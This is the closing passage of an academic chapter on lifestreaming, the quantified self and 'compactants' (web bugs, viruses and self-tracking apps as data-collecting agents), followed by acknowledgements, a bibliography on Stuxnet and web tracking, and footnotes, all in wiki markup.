Lastly, I want to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as the ‘real-time streams’ platforms have expanded, like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', who argue that the:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as 'self-tracking', 'body hacking' or 'self-quantifying'. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This phenomena of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband]... has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents -- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and 'compress' large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Gelernter originally described these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving the innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, which has short text-message sized 140 character updates. Nonetheless this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect their data systematically.&amp;amp;nbsp;As he explains, Wolfram started in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions about the increasing use of mathematics and computation to understand and control the self. The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- 'Geraldine posted a photo to her album' or 'John shared a video'. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and aggregative use case, in other words for the individual user (or lifestreamer) or organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class or others.[13] &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational 'care of the self', facilitated by an army of oligopticans (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining the meaning and narratives through a stabilisation and web of meaning for the actor.[14] &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society.&amp;lt;br&amp;gt;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself: this is data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand such software ecologies (Berry, 2011).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the most interesting aspects of these systems is that humans in many cases become the vectors that both enable the data transfers and carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks, creates the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions, particularly in relation to the complexity and obfuscated nature of the code and its ability to track and collect data surreptitiously. However, users are actively downloading apps that advertise the fact that they collect this data and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs are in many ways life streams - albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to particularly draw attention to this passive-aggressive feature of computational agents that are collecting information. Both in terms of their passive quality – under the surface, relatively benign and silent – but also the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and compact as in conciseness in expression. The etymology from the Latin ''compact'' for closely put together, or joined together, also neatly expresses the sense of what web bugs and related technologies are. That is, compactants are interesting in terms of the distributed agency they enable, which can be understood through the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that is often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, or server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the 'future self' will be required to undo bad habits and behaviours of the present-self. That is, that there is an explicit normative context to a ''future'' self, who you, as the ''present'' self may be treating unfairly, immorally or without due regard to what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal temporal representation of time within computational systems, that is time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; There are many examples of how attending to the code and software that structures many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights into both our usage of code and software, but also the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not fully been incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attests. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to the critical theorists, both of the present looking to provide critique and counterfactuals, but also ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. I would also like to express my deepest thanks to Michael Najjar for the kind permission to use his work, 'The sublime brain [of Jonathon]', for the cover of the book which represents a neuronal frontal portait of an individual, for more of his excellent work please see [http://www.michaelnajjar.com]. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) 'Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;', ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) 'Stuxnet: Computer worm opens new era of warfare', ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) 'Activity Streams', accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) 'JSON Activity Streams 1.0', Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) 'Iran says Stuxnet virus infected 16,000 computers', ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) 'European Watchdog Pushes for Do Not Track Protocol', accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) 'Iran Confirms Stuxnet Worm Halted Centrifuges', ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) 'How Stuxnet Is Rewriting the Cyberterrorism Playbook', ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) 'Stuxnet Myrtus or MyRTUs?', accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) 'A Life Lived in Media', ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) 'Privacy Effects of Web Bugs Amplified by Web 2.0', in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) 'Counting every moment', ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) 'The Web Bug FAQ', accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) 'Duqu Trojan used 'unknown' programming language: Kaspersky', CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) 'How HP bugged e-mail', accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) 'How To Manufacture&amp;amp;nbsp;Desire', ''TechCrunch'',accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Frabetti, F. (2010) 'Critical Code Studies', accessed 15/03/2012, http://vimeo.com/16263212 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) 'Dunn grilled by Congress', accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) 'The Lifestreams Software Architecture', Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) 'Welcome to the Yale Lifestreams homepage!', accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) 'Americans Love Google! Americans Hate Google!', ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994) 'The cyber-road not taken.', ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) 'Time To Start Taking The Internet Seriously', ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) 'The Many Data Hats a Company can Wear', accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) 'Ghostrank Planetary System', accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) 'About Ghostery', accessed 02/03/2012, http://www.ghostery.com/about) &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) 'About ChartBeat', accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) 'Stuxnet/Duqu: The Evolution of Drivers', SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) 'A Declaration of Cyber-War', ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hall, G. (2011) ''Digitize Me, Visualize Me, Search Me'', Open Humanities Press, accessed 02/03/2012, http://www.livingbooksaboutlife.org/books/Digitize_Me,_Visualize_Me,_Search_Me &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Harraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) 'Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis', ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) ''New Stuxnet' worm targets companies in Europe', ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu '' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) 'Stuxnet opens cracks in Iran nuclear program', accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) 'Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon', accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2012) 'Display Advertising Technology Landscape', accessed 02/06/2012, http://www.lumapartners.com/resource-center/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) 'I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web', ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) 'In a Computer Worm, a Possible Biblical Clue', ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) 'Stuxnet Under the Microscope', accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) 'The Importance of Philosophy to Engineering', ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) 'User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web', Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) 'The Stuxnet Sting', accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Parikka, J. (2012) ''Medianatures: The Materiality of Information Technology and Electronic Waste'', Open Humanities Press, accessed 01/06/2012, http://www.livingbooksaboutlife.org/books/Medianatures &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Parry, D. (2011) ''Ubiquitous Surveillance'', Open Humanities Press, http://www.livingbooksaboutlife.org/books/Ubiquitous_Surveillance &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) 'Langner’s Stuxnet Deep Dive S4 Video', accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) 'Search Engine Use 2012', accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) 'So What Do We Do With All This Data?', _The Smithsonian_, accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sanger, D. E. (2012) Obama Order Sped Up Wave of Cyberattacks Against Iran, The New York Times, June 1, 2012, accessed 02/06/2012, http://www.nytimes.com/2012/06/01/world/middleeast/obama-ordered-wave-of-cyberattacks-against-iran.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) 'Feel. Act. Make sense', accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) 'Bad Habits? My Future Self Will Deal With That', accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wauters, R (2012) '427 million Europeans are now online, 37% uses more than one device: IAB', The Next Web, accessed 01/06/2012, http://thenextweb.com/eu/2012/05/31/427-million-europeans-are-now-online-37-uses-more-than-one-device-iab/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) 'Tracking Protection Working Group', accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) 'The Personal Analytics of My Life', accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) 'CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth', ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) 'Blockbuster Worm Aimed for Infrastructure', But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) 'Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant', ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies and Locally Stored Objects (LSOs) and document object model storage (DOM Storage) &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal, 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: 'Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity' (Ghostery, 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
